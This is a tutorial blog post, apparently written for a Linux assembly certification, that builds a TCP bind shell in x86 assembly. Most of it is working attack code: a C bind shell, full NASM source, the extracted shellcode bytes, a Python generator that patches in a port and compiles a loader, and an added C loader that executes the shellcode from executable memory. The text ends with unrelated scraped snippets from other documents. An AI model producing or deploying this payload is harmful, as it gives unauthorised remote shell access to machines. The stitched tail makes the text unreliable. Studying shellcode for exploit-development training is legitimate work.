Linux TCP Bind Shell from Scratch with Intel x86 Assembly
Amonsec, Jun 13, 2017 (v1.0)
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-975
Assignment number: #1
Github repository:

Table of Contents

What is a TCP bind shell?
Syscalls & socket functions
From C to Assembly
    Create a socket
    Bind our socket
    Listening
    Accept an incoming connection
    Duplicate our File Descriptor
    Execute the shell
Assembling pieces
Optimization
Introduction

The aim of this post is to create from scratch a Linux TCP bind shell in Intel x86 assembly instead of taking one from Metasploit. It is always a good thing to write your own shellcode because:

- You know what you are running
- You get a small, custom shellcode
- It is fun

What you need in order to reproduce the process:

- A Linux x86 system (Kali Linux in my case)
- Your brain (and maybe a cup of coffee, or eight)

What is a TCP bind shell?

A TCP bind shell is a program that acts as a server on a local port: it waits for a connection, and when someone connects to that port it hands them a shell. The following C code is an example of a TCP bind shell:

    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <string.h>
    #include <unistd.h>
    #include <stdio.h>

    int main(void)
    {
        int clientfd;
        int sockfd;
        int port = 31337;
        struct sockaddr_in addr;

        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        addr.sin_addr.s_addr = INADDR_ANY;

        bind(sockfd, (struct sockaddr *) &addr, sizeof(addr));
        listen(sockfd, 1);
        clientfd = accept(sockfd, NULL, NULL);

        dup2(clientfd, 0);
        dup2(clientfd, 1);
        dup2(clientfd, 2);

        /* Linux accepts NULL for argv and envp (treated as empty) */
        execve("/bin/sh", NULL, NULL);
        return 0;
    }
A bit esoteric? Let me explain what this code does. First we create a socket, here called sockfd:

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

Then we fill in the address structure that we will bind the socket to:

    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = INADDR_ANY;

After that, we bind our socket to the desired port, here 31337:

    bind(sockfd, (struct sockaddr *) &addr, sizeof(addr));

At this point we can listen for an incoming connection and accept it. Note that because we pass NULL for the address and address-length arguments of accept(), the peer's address is not stored anywhere (we do not need it):

    listen(sockfd, 1);
    clientfd = accept(sockfd, NULL, NULL);

All we need to do now is duplicate the client socket onto stdin (0), stdout (1) and stderr (2), so that the shell reads from and writes to the connection:

    dup2(clientfd, 0);
    dup2(clientfd, 1);
    dup2(clientfd, 2);

Finally, we can execute /bin/sh:

    execve("/bin/sh", NULL, NULL);

Let's compile and see if this code works:
Sweet!

Syscalls & socket functions

A system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. This may include hardware-related services (for example, accessing a hard disk drive), creation and execution of new processes, and communication with integral kernel services such as process scheduling. According to the Linux man page: "The system call is the fundamental interface between an application and the Linux kernel."

So, which syscalls do we need in order to create our bind shell? The following command gives us the answer, and the header where the syscall numbers are defined:

    amonsec@anakin:/$ cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep -E 'socketcall|dup2|execve' | head -3
    #define __NR_execve 11
    #define __NR_dup2 63
    #define __NR_socketcall 102
    amonsec@anakin:/$

On 32-bit x86 the traditional way to reach the socket API is the socketcall() multiplexer: one syscall number (102) for all socket functions, with the id of the wanted function in EBX and a pointer to an array of its arguments in ECX. Note, there is also an awesome website for looking up syscall numbers and much more:

Now we need the ids of the socket functions that we want to use with socketcall(). For that, the Linux NET header can help us. According to its documentation: "NET is an implementation of the SOCKET network access protocol. This is the master header file for the Linux NET layer, or, in plain English: the networking handling part of the kernel." To find the function ids we can use the following command:
    amonsec@anakin:~$ cat /usr/include/linux/net.h
    [..snip..]
    #define SYS_SOCKET 1
    #define SYS_BIND 2
    #define SYS_CONNECT 3
    #define SYS_LISTEN 4
    #define SYS_ACCEPT 5
    #define SYS_GETSOCKNAME 6
    #define SYS_GETPEERNAME 7
    #define SYS_SOCKETPAIR 8
    #define SYS_SEND 9
    #define SYS_RECV 10
    #define SYS_SENDTO 11
    #define SYS_RECVFROM 12
    #define SYS_SHUTDOWN 13
    #define SYS_SETSOCKOPT 14
    #define SYS_GETSOCKOPT 15
    #define SYS_SENDMSG 16
    #define SYS_RECVMSG 17
    #define SYS_ACCEPT4 18
    #define SYS_RECVMMSG 19
    #define SYS_SENDMMSG 20
    [..snip..]

Moreover, we need a few other things, such as the id of the socket type that we want to use:

    amonsec@anakin:~$ cat /usr/include/i386-linux-gnu/bits/socket_type.h | grep 'SOCK_STREAM'
      SOCK_STREAM = 1,   /* Sequenced, reliable, connection-based
    #define SOCK_STREAM SOCK_STREAM
    amonsec@anakin:~$

And the id of the protocol family that we are going to use:

    amonsec@anakin:~$ cat /usr/include/i386-linux-gnu/bits/socket.h | grep 'PF_INET' | grep -v 6
    #define PF_INET 2 /* IP protocol family. */
    #define AF_INET PF_INET
    amonsec@anakin:~$

We have everything we need! Now let's begin the sorcery!
From C to Assembly

Create a socket

Every socket function goes through socketcall() (syscall 102, 0x66): EAX holds the syscall number, EBX holds the id of the socket function we want (here 1, SYS_SOCKET) and ECX points to an array of that function's arguments, which we build on the stack by pushing them in reverse order. The arguments of socket() are the address family (2, AF_INET), the socket type (1, SOCK_STREAM) and the protocol (0). The following code creates our socket:

    global _start

    section .text

    _start:
        ; Create our socket
        ; socket(AF_INET, SOCK_STREAM, 0)
        xor ebx, ebx        ; zeroed EBX
        mov bl, 0x01        ; #define SYS_SOCKET 1
        xor edx, edx        ; zeroed EDX
        xor ecx, ecx        ; zeroed ECX
        push edx            ; protocol = 0
        push ebx            ; SOCK_STREAM = 1
        push byte 0x02      ; AF_INET = 2
        mov ecx, esp        ; ECX = pointer to the arguments
        xor eax, eax        ; zeroed EAX
        mov al, 0x66        ; #define __NR_socketcall 102
        int 0x80            ; Interrupt
        xchg esi, eax       ; Save sockfd in ESI

Note: after the int 0x80, EAX contains the socket file descriptor returned by the kernel (or a negative errno on failure). We must save it somewhere, because we need it for every following call and EAX is overwritten by the next syscall; xchg esi, eax does that in a single byte. Schema:
Bind our socket

Now we have a socket and we can bind it. For that we first need to build the sockaddr structure, which looks like this in C:

    struct sockaddr_in {
        short sin_family;          // e.g. AF_INET, AF_INET6
        unsigned short sin_port;   // e.g. htons(3490)
        struct in_addr sin_addr;   // see struct in_addr, below
        char sin_zero[8];          // padding, ignored by the kernel for AF_INET
    };

With that and the id of the bind function, we are good to go. Note that the port must be in network byte order (big-endian): 31337 is 0x7A69, and since push stores its immediate little-endian we write 0x697A to get the bytes 7A 69 in memory. The structure is built on the stack by pushing its fields in reverse order; its address is saved in ECX before the bind() argument array is pushed on top of it.

    ; Bind our socket
    ; addr.sin_family = AF_INET;
    ; addr.sin_port = htons(port);
    ; addr.sin_addr.s_addr = INADDR_ANY;
    ; bind(sockfd, (struct sockaddr *) &addr, sizeof(addr));
    inc ebx             ; #define SYS_BIND 2
    push edx            ; INADDR_ANY = 0
    push word 0x697A    ; Port in big-endian = 31337 (0x7A69)
    push bx             ; AF_INET = 2
    mov ecx, esp        ; ECX = pointer to sockaddr
    push byte 0x10      ; sizeof(addr) = 16
    push ecx            ; &addr
    push esi            ; sockfd
    mov ecx, esp        ; ECX = pointer to the arguments
    mov al, 0x66        ; #define __NR_socketcall 102
    int 0x80            ; Interrupt

Note that only 8 bytes of the structure are pushed while 16 is passed as its length, so the 8 bytes of sin_zero the kernel copies are whatever sits just above on the stack (the leftover socket() arguments). That is fine for AF_INET, which ignores sin_zero, and it saves a few bytes of shellcode. Schema:
Listening

The next step is to tell our socket to listen for incoming connections. listen() takes two arguments: the socket and the backlog.

    ; Listen
    ; listen(sockfd, backlog)
    push edx            ; 0
    inc ebx             ; EBX = EBX + 1
    inc ebx             ; EBX = EBX + 1, #define SYS_LISTEN 4
    push ebx            ; this dword becomes args[1]
    push esi            ; sockfd
    mov ecx, esp        ; ECX = pointer to the arguments
    mov al, 0x66        ; #define __NR_socketcall 102
    int 0x80            ; Interrupt

Note that the argument array ECX points to is {sockfd, 4, 0}: the pushed EBX, not the pushed 0, is what the kernel reads as the backlog. A backlog of 4 works just as well as 0 for the single connection we need, so the extra push is harmless, but it is worth knowing what the kernel actually sees. Schema:

Accept an incoming connection

OK, we have a socket, we bound it and it is listening for an incoming connection; now we can call accept() to take that connection.

    ; Accept
    ; accept(sockfd, NULL, NULL)
    inc ebx             ; #define SYS_ACCEPT 5
    push edx            ; NULL (addrlen)
    push edx            ; NULL (addr)
    push esi            ; sockfd
    mov ecx, esp        ; ECX = pointer to the arguments
    mov al, 0x66        ; #define __NR_socketcall 102
    int 0x80            ; Interrupt
    xchg ebx, eax       ; Save clientfd in EBX
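To check what the pushes in the bind and listen steps above really produce, here is an added example in C (my own code, not part of the original post). It emulates the x86 stack on a little-endian host: it rebuilds the bind() address the way the shellcode pushes it and compares it byte for byte with a real struct sockaddr_in, computes the push word immediate for any port, flags ports whose network-order encoding contains a NUL byte, and lays out the listen() argument array to show that the pushed EBX (4), not the pushed 0, is what the kernel reads as the backlog. The function names and the emulated stack are assumptions of this example; the only thing it relies on beyond the post is an x86 (little-endian) host.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Emulated x86 stack: grows downwards, values stored little-endian,
 * exactly as push lays them out on a 32-bit x86 host. */
struct stack { unsigned char mem[64]; size_t sp; };

static void stack_init(struct stack *s) { memset(s, 0, sizeof *s); s->sp = sizeof s->mem; }
static void push_dword(struct stack *s, uint32_t v) { s->sp -= 4; memcpy(s->mem + s->sp, &v, 4); }
static void push_word(struct stack *s, uint16_t v)  { s->sp -= 2; memcpy(s->mem + s->sp, &v, 2); }

/* Immediate for "push word imm16" so that memory holds the port in network
 * order: 31337 = 0x7A69 -> 0x697A, because push stores the low byte first. */
uint16_t port_push_word(uint16_t port)
{
    return (uint16_t)(((port & 0xff) << 8) | (port >> 8));
}

/* A port whose network-order encoding contains 0x00 cannot be spliced into
 * this shellcode (e.g. 80 = 0x0050, 1024 = 0x0400). */
int port_has_null_byte(uint16_t port)
{
    return (port >> 8) == 0 || (port & 0xff) == 0;
}

/* Rebuild the bind() address as the shellcode does (push edx; push word
 * port; push bx) and compare it with a real struct sockaddr_in. */
int pushed_sockaddr_matches(uint16_t port)
{
    struct stack s;
    struct sockaddr_in ref;

    stack_init(&s);
    push_dword(&s, INADDR_ANY);             /* push edx        (sin_addr = 0.0.0.0) */
    push_word(&s, port_push_word(port));     /* push word 0x697A (sin_port)          */
    push_word(&s, AF_INET);                  /* push bx         (sin_family = 2)     */

    memset(&ref, 0, sizeof ref);
    ref.sin_family = AF_INET;
    ref.sin_port = htons(port);
    ref.sin_addr.s_addr = INADDR_ANY;

    /* Only the first 8 bytes are pushed; sin_zero is never written. */
    return memcmp(s.mem + s.sp, &ref, 8) == 0;
}

/* Lay out the listen() call exactly as the shellcode pushes it and return
 * args[index] as socketcall(SYS_LISTEN, args) reads it:
 * args[0] = sockfd, args[1] = backlog. */
uint32_t listen_arg_as_pushed(uint32_t sockfd, int index)
{
    struct stack s;
    uint32_t ebx = 2;                        /* EBX after SYS_BIND */
    uint32_t args[2];

    stack_init(&s);
    push_dword(&s, 0);                       /* push edx: meant as backlog 0   */
    ebx++; ebx++;                            /* inc ebx; inc ebx -> SYS_LISTEN */
    push_dword(&s, ebx);                     /* push ebx: this lands in args[1] */
    push_dword(&s, sockfd);                  /* push esi: this lands in args[0] */
    memcpy(args, s.mem + s.sp, sizeof args); /* mov ecx, esp                   */
    return args[index & 1];
}

int main(void)
{
    unsigned int ports[] = { 31337, 4444, 80, 1024 };
    for (size_t i = 0; i < sizeof ports / sizeof ports[0]; i++) {
        uint16_t p = (uint16_t)ports[i];
        printf("port %5u: push word 0x%04X, null byte: %s, matches sockaddr_in: %s\n",
               (unsigned)p, (unsigned)port_push_word(p),
               port_has_null_byte(p) ? "yes" : "no",
               pushed_sockaddr_matches(p) ? "yes" : "no");
    }
    printf("listen(): sockfd=%u backlog=%u\n",
           listen_arg_as_pushed(3, 0), listen_arg_as_pushed(3, 1));
    return 0;
}
```

Build with gcc -o pushes pushes.c (the file name is arbitrary); the same logic applies to any port you want to splice into the shellcode, which is why the null-byte check is done on the network-order bytes and not on the decimal value.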
Duplicate our File Descriptor

We are almost at the end! At this point we need to call dup2() three times so that the client socket becomes STDIN (0), STDOUT (1) and STDERR (2). dup2 is a regular syscall (63): EBX holds the old descriptor (our clientfd, placed there by the xchg above) and ECX the new one. We have two possibilities, with a loop or without.

The loop version:

    ; Dup2
    ; dup2(clientfd, 0)
    ; dup2(clientfd, 1)
    ; dup2(clientfd, 2)
    xor ecx, ecx        ; zeroed ECX
    dup:
        mov al, 0x3f    ; #define __NR_dup2 63
        int 0x80        ; Interrupt
        inc ecx         ; ECX = ECX + 1
        cmp ecx, 0x3    ; Compare ECX and 3
        jne dup         ; Jump if not equal

The basic version:

    xor ecx, ecx        ; zeroed ECX
    mov al, 0x3f        ; #define __NR_dup2 63
    int 0x80            ; Interrupt
    inc ecx             ; ECX = ECX + 1
    mov al, 0x3f        ; #define __NR_dup2 63
    int 0x80            ; Interrupt
    inc ecx             ; ECX = ECX + 1
    mov al, 0x3f        ; #define __NR_dup2 63
    int 0x80            ; Interrupt

Setting only AL works here because each dup2 returns the new descriptor (0, 1 or 2), so the upper bytes of EAX stay zero between the calls.
Schema:

Execute the shell

Our last step! Now we only need to execute a shell, in our case /bin/sh. The prototype of execve looks like this:

    int execve(const char *filename, char *const argv[], char *const envp[]);

EBX must point to the path of the binary to execute, /bin/sh in our case, and ECX and EDX (argv and envp) are not used, so they must be NULL. Let's translate the C into assembly:

    ; Execve
    ; execve("/bin/sh", NULL, NULL)
    push edx            ; Null terminator (EDX is still 0)
    push 0x68732f2f     ; hs//
    push 0x6e69622f     ; nib/
    mov ebx, esp        ; EBX = "/bin//sh"
    mov ecx, edx        ; NULL
    mov al, 0x0b        ; #define __NR_execve 11
    int 0x80            ; Done :)
Schema:

Note that the null terminator ends the string and makes sure nothing unwanted is appended to it. Moreover, push writes 4 bytes at a time, which is why we push /bin//sh (8 bytes) instead of /bin/sh (7 bytes): the kernel's path resolution collapses the doubled slash, and this way no NULL byte is needed inside the shellcode. Because the stack is LIFO, we push the dwords in reverse order. If you want to create opcodes from a string you can use one of my Python scripts here: string2opcode.py
Assembling pieces

    global _start

    section .text

    _start:
        ; Create our socket
        ; socket(AF_INET, SOCK_STREAM, 0)
        xor ebx, ebx
        mov bl, 0x01
        xor edx, edx
        xor ecx, ecx
        push edx
        push ebx
        push byte 0x02
        mov ecx, esp
        xor eax, eax
        mov al, 0x66
        int 0x80
        xchg esi, eax

        ; Bind our socket
        ; addr.sin_family = AF_INET;
        ; addr.sin_port = htons(port);
        ; addr.sin_addr.s_addr = INADDR_ANY;
        ; bind(sockfd, (struct sockaddr *) &addr, sizeof(addr));
        inc ebx
        push edx
        push word 0x697A
        push bx
        mov ecx, esp
        push byte 0x10
        push ecx
        push esi
        mov ecx, esp
        mov al, 0x66
        int 0x80

        ; Listen
        ; listen(sockfd, backlog)
        push edx
        inc ebx
        inc ebx
        push ebx
        push esi
        mov ecx, esp
        mov al, 0x66
        int 0x80

        ; Accept
        ; accept(sockfd, NULL, NULL)
        inc ebx
        push edx
        push edx
        push esi
        mov ecx, esp
        mov al, 0x66
        int 0x80
        xchg ebx, eax

        ; Dup2
        ; dup2(clientfd, 0)
        ; dup2(clientfd, 1)
        ; dup2(clientfd, 2)
        xor ecx, ecx
    dup:
        mov al, 0x3f
        int 0x80
        inc ecx
        cmp ecx, 0x3
        jne dup

        ; Execve
        ; execve("/bin/sh", NULL, NULL)
        push edx
        push 0x68732f2f
        push 0x6e69622f
        mov ebx, esp
        mov ecx, edx
        mov al, 0x0b
        int 0x80

Let's assemble and link this code and see if it works.

    amonsec@anakin:/opt/slae/assignment-1$ nasm -felf32 bind_shell_linux_x86.asm
    amonsec@anakin:/opt/slae/assignment-1$ ld -melf_i386 bind_shell_linux_x86.o -o bind

And it works!
Optimization

Now we want a simple Python script that builds a binary with the desired port. First, we need to extract the shellcode:

    amonsec@anakin:/opt/slae/assignment-1$ objdump -d ./bind | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
    "\x31\xdb\xb3\x01\x31\xd2\x31\xc9\x52\x53\x6a\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x96\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb0\x66\xcd\x80\x52\x43\x43\x53\x56\x89\xe1\xb0\x66\xcd\x80\x43\x52\x52\x56\x89\xe1\xb0\x66\xcd\x80\x93\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xd1\xb0\x0b\xcd\x80"
    amonsec@anakin:/opt$

With the shellcode (94 bytes, no null byte) let's write our Python script. It replaces the two port bytes that follow the push word opcode (\x66\x68), refuses any port whose network-order encoding would contain a null byte, and writes and compiles a small C loader:

    #!/usr/bin/env python
    from __future__ import print_function
    import sys
    import re
    import os

    # Colorz
    RED = "\x1b[1;31m"
    BLU = "\x1b[1;34m"
    GRE = "\x1b[1;32m"
    RST = "\x1b[0;0;0m"

    # Lambda
    info_message = lambda x: '{}[*]{} {}'.format(BLU, RST, x)
    suce_message = lambda x: '{}[+]{} {}'.format(GRE, RST, x)
    erro_message = lambda x: '{}[-]{} {}'.format(RED, RST, x)

    # Core
    print(info_message('Linux x86 TCP bind shell (v1.0)'))
    print(info_message('Author {}Amonsec{}\n'.format(RED, RST)))

    if len(sys.argv) < 2:
        print(info_message('Usage: python {} <local port>'.format(sys.argv[0])))
        sys.exit(0)

    port = int(sys.argv[1])
    if port < 1 or port > 65535:
        print(erro_message('You\'re drunk. Go home. Go home'))
        sys.exit(0)

    # Port as four hex digits in network byte order, e.g. 31337 -> '7a69'
    port = '{:04x}'.format(port)

    hexchain = ''
    for x in re.findall('..', port):
        if x == '00':
            print(erro_message('Null byte detected'))
            sys.exit(0)
        hexchain += '\\x' + x
    print(suce_message('Hexchain port: {}'.format(hexchain)))

    # The shellcode, with the port bytes spliced in after "push word" (\x66\x68)
    shellcode = (
        "\\x31\\xdb\\xb3\\x01\\x31\\xd2\\x31\\xc9\\x52\\x53\\x6a"
        "\\x02\\x89\\xe1\\x31\\xc0\\xb0\\x66\\xcd\\x80\\x96\\x43"
        "\\x52\\x66\\x68" + hexchain + "\\x66\\x53\\x89\\xe1\\x6a\\x10"
        "\\x51\\x56\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x52\\x43\\x43"
        "\\x53\\x56\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x43\\x52\\x52"
        "\\x56\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x93\\x31\\xc9\\xb0"
        "\\x3f\\xcd\\x80\\x41\\x83\\xf9\\x03\\x75\\xf6\\x52\\x68"
        "\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3"
        "\\x89\\xd1\\xb0\\x0b\\xcd\\x80")

    print(suce_message('Your shellcode:\n'))
    print(shellcode)
    print('')

    print(info_message('Creating the C file...'))
    filename = 'bind_shell_linux_x86.c'
    content = ''
    content += '#include <stdio.h>\n'
    content += '#include <string.h>\n'
    content += 'unsigned char shellcode[] =\n'
    content += '"' + shellcode + '";\n'
    content += 'int main() {\n'
    content += '    int (*ret)() = (int(*)())shellcode;\n'
    content += '    ret();\n'
    content += '}\n'

    data = open(filename, 'w')
    data.write(content)
    data.close()
    print(suce_message('C file successfully created.'))

    print(info_message('Compiling the C file...'))
    # -z execstack makes the segment holding the shellcode executable;
    # on a 64-bit host add -m32, since the shellcode uses the i386 int 0x80 ABI.
    status = os.system('gcc -fno-stack-protector -z execstack bind_shell_linux_x86.c -o bind_shell_linux_x86')
    if status != 0:
        print(erro_message('Error with the compilation'))
        sys.exit(1)
    print(suce_message('C file successfully compiled.'))
    print(suce_message('You are good to go 1337'))
    print('')
    sys.exit(0)
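As an added example (my own code, not the original post's script), here is the same template handling done in C, which also serves as a loader. It embeds the 94-byte shellcode from above, locates the port immediate by searching for the push word opcode (0x66 0x68) instead of hard-coding an offset, patches any port in at that position while refusing ports that would introduce a NUL byte, and runs the result from an RWX mmap() region rather than relying on -z execstack (on recent toolchains execstack no longer makes .data executable, so the C file generated by the script above may segfault there). The executing part is guarded with #if defined(__i386__), because the int 0x80 numbers are the i386 ABI; build with -m32 on a 64-bit host. Function and file names are assumptions of this example.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* The 94-byte shellcode produced above, with its original port 31337. */
static const unsigned char bind_shell[] =
    "\x31\xdb\xb3\x01\x31\xd2\x31\xc9\x52\x53\x6a\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x96"
    "\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb0\x66\xcd\x80"
    "\x52\x43\x43\x53\x56\x89\xe1\xb0\x66\xcd\x80"
    "\x43\x52\x52\x56\x89\xe1\xb0\x66\xcd\x80\x93"
    "\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6"
    "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";

#define SHELLCODE_LEN (sizeof bind_shell - 1)   /* drop the string literal's own NUL */

size_t shellcode_len(void) { return SHELLCODE_LEN; }

/* Offset of the imm16 of "push word imm16" (opcode 66 68): the port is the
 * two bytes that follow. Returns -1 if the opcode is not found. */
int port_offset(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i + 3 < len; i++)
        if (sc[i] == 0x66 && sc[i + 1] == 0x68)
            return (int)(i + 2);
    return -1;
}

/* Read the port back out of a template (bytes are in network order). */
int port_in_shellcode(const unsigned char *sc, size_t len)
{
    int off = port_offset(sc, len);
    if (off < 0) return -1;
    return (sc[off] << 8) | sc[off + 1];
}

/* First offset of a NUL byte, or -1 if the buffer is NUL-free. */
int first_null(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0) return (int)i;
    return -1;
}

/* Copy the template into buf and patch the port in. Returns 0 on success,
 * -1 if the port would introduce a NUL byte (e.g. 80 = 0x0050). */
int patch_port(unsigned char *buf, uint16_t port)
{
    int off;
    if ((port >> 8) == 0 || (port & 0xff) == 0) return -1;
    memcpy(buf, bind_shell, SHELLCODE_LEN);
    off = port_offset(buf, SHELLCODE_LEN);
    buf[off] = (unsigned char)(port >> 8);
    buf[off + 1] = (unsigned char)(port & 0xff);
    return 0;
}

/* Patch a port into a scratch copy and read it back; -1 if it was refused. */
int patched_port_roundtrip(uint16_t port)
{
    static unsigned char scratch[SHELLCODE_LEN];
    if (patch_port(scratch, port) != 0) return -1;
    if (first_null(scratch, SHELLCODE_LEN) != -1) return -1;
    return port_in_shellcode(scratch, SHELLCODE_LEN);
}

/* Run the shellcode from an RWX mapping. Only meaningful in a 32-bit x86
 * process; never returns on success because execve replaces the process. */
int run_shellcode(const unsigned char *sc, size_t len)
{
#if defined(__i386__)
    void (*fn)(void);
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;
    memcpy(mem, sc, len);
    memcpy(&fn, &mem, sizeof fn);   /* object pointer -> function pointer without a cast warning */
    fn();
    return 0;
#else
    (void)sc; (void)len;
    fprintf(stderr, "not a 32-bit x86 process; build with -m32 to execute\n");
    return -1;
#endif
}

int main(int argc, char **argv)
{
    unsigned char buf[SHELLCODE_LEN];
    uint16_t port = argc > 1 ? (uint16_t)atoi(argv[1]) : 31337;

    if (patch_port(buf, port) != 0) {
        fprintf(stderr, "port %u would put a NUL byte in the shellcode\n", (unsigned)port);
        return 1;
    }
    printf("shellcode: %zu bytes, port %d, first NUL at %d\n", shellcode_len(),
           port_in_shellcode(buf, SHELLCODE_LEN), first_null(buf, SHELLCODE_LEN));
    return run_shellcode(buf, SHELLCODE_LEN) == 0 ? 0 : 1;
}
```

Usage, assuming the file is saved as loader.c: gcc -m32 -o loader loader.c && ./loader 4444, then nc 127.0.0.1 4444 from another terminal. Searching for the opcode rather than hard-coding offset 25 means the patcher keeps working if you later shorten or reorder the socket() part of the shellcode, as long as the push word remains the first one.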
More informationl27 handout.txt buggy server.c Printed by Michael Walfish Apr 29, 10 13:41 Page 1/1 Apr 29, 10 11:51 Page 1/1
Apr 29, 10 13:41 Page 1/1 1 Handout for CS 372H 2 Class 27 3 29 April 2010 4 5 1. Introduction to buffer overflow attacks 6 7 There are many ways to attack computers. Today we study the 8 "classic" method.
More informationPiotr Mielecki Ph. D.
Piotr Mielecki Ph. D. http://mielecki.ristel.pl/ piotr.mielecki@pwr.edu.pl pmielecki@gmail.com Building blocks of client-server applications: Client, Server, Middleware. Simple client-server application:
More informationBiography. Background
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com
More informationCSE 333 Lecture network programming intro
CSE 333 Lecture 17 -- network programming intro Hal Perkins Paul G. Allen School of Computer Science & Engineering University of Washington Administrivia HW3 due Thursday night HW4 out Friday morning -
More informationMachine Language, Assemblers and Linkers"
Machine Language, Assemblers and Linkers 1 Goals for this Lecture Help you to learn about: IA-32 machine language The assembly and linking processes 2 1 Why Learn Machine Language Last stop on the language
More informationUNIX Network Programming. Overview of Socket API Network Programming Basics
UNIX Network Programming Overview of Socket API Network Programming Basics 1 Client-Server Model Client Machine A Network Server Machine B Web browser and server FTP client and server Telnet client and
More informationSockets 15H2. Inshik Song
Sockets 15H2 Inshik Song Internet CAU www server (www.cau.ac.kr) Your web browser (Internet Explorer/Safari) Sockets 2 How do we find the server? Every computer on the Internet has an Internet address.
More informationLecture 04 Control Flow II. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Based on Michael Bailey s ECE 422
Lecture 04 Control Flow II Stehen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Based on Michael Bailey s ECE 422 Function calls on 32-bit x86 Stack grows down (from high to low addresses)
More informationOral. Total. Dated Sign (2) (5) (3) (2)
R N Oral Total Dated Sign (2) (5) (3) (2) Assignment Group- A_07 Problem Definition Write a program using TCP socket for wired network for following Say Hello to Each other ( For all students) File transfer
More informationReturn Oriented Programming
ROP gadgets Small instruction sequence ending with a ret instruction 0xc3 Gadgets are found in existing, resident code and libraries There exist tools to search for and find gadgets Gadgets are put together
More informationSystem Programming. Sockets
Content : by Dr. B. Boufama School of Computer Science University of Windsor Instructor: Dr. A. Habed adlane@cs.uwindsor.ca http://cs.uwindsor.ca/ adlane/60-256 Content Content 1 Introducing 2 3 Internet
More informationReturn oriented programming
Return oriented programming TOOR - Computer Security Hallgrímur H. Gunnarsson Reykjavík University 2012-05-04 Introduction Many countermeasures have been introduced to foil EIP hijacking: W X: Prevent
More informationALT-Assembly Language Tutorial
ALT-Assembly Language Tutorial ASSEMBLY LANGUAGE TUTORIAL Let s Learn in New Look SHAIK BILAL AHMED i A B O U T T H E T U TO R I A L Assembly Programming Tutorial Assembly language is a low-level programming
More informationCSE 333 SECTION 6. Networking and sockets
CSE 333 SECTION 6 Networking and sockets Overview Network Sockets IP addresses and IP address structures in C/C++ DNS Resolving DNS names Demos Section exercise Sockets Network sockets are network interfaces
More informationNetwork Programming November 3, 2008
15-213 Network Programming November 3, 2008 Topics Programmer s view of the Internet (review) Sockets interface Writing clients and servers class20.ppt A Client-Server Transaction Most network applications
More informationSocket Programming for TCP and UDP
CSCI4430 Data Communication and Computer Networks Socket Programming for TCP and UDP ZHANG, Mi Jan. 19, 2017 Outline Socket Programming for TCP Introduction What is TCP What is socket TCP socket programming
More informationContext. Distributed Systems: Sockets Programming. Alberto Bosio, Associate Professor UM Microelectronic Departement
Distributed Systems: Sockets Programming Alberto Bosio, Associate Professor UM Microelectronic Departement bosio@lirmm.fr Context Computer Network hosts, routers, communication channels Hosts run applications
More informationReverse Engineering II: The Basics
Reverse Engineering II: The Basics This document is only to be distributed to teachers and students of the Malware Analysis and Antivirus Technologies course and should only be used in accordance with
More information9/13/2007. Motivations for Sockets What s in a Socket? Working g with Sockets Concurrent Network Applications Software Engineering for Project 1
Daniel Spangenberger 15 441 Computer Networks, Fall 2007 Goal of Networking: Communication Share data Pass Messages Say I want to talk to a friend in Singapore How can I do this? What applications and
More informationIntroduction to Socket Programming
Introduction to Socket Programming Sandip Chakraborty Department of Computer Science and Engineering, INDIAN INSTITUTE OF TECHNOLOGY KHARAGPUR March 21, 2017 Sandip Chakraborty (IIT Kharagpur) CS 39006
More informationWinSock. What Is Sockets What Is Windows Sockets What Are Its Benefits Architecture of Windows Sockets Network Application Mechanics
WinSock What Is Sockets What Is Windows Sockets What Are Its Benefits Architecture of Windows Sockets Network Application Mechanics What Is Sockets Standard API (Application Programming Interface) for
More informationTypes (Protocols) Associated functions Styles We will look at using sockets in C Java sockets are conceptually quite similar
Socket Programming What is a socket? Using sockets Types (Protocols) Associated functions Styles We will look at using sockets in C Java sockets are conceptually quite similar - Advanced Data Communications:
More informationBuffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to
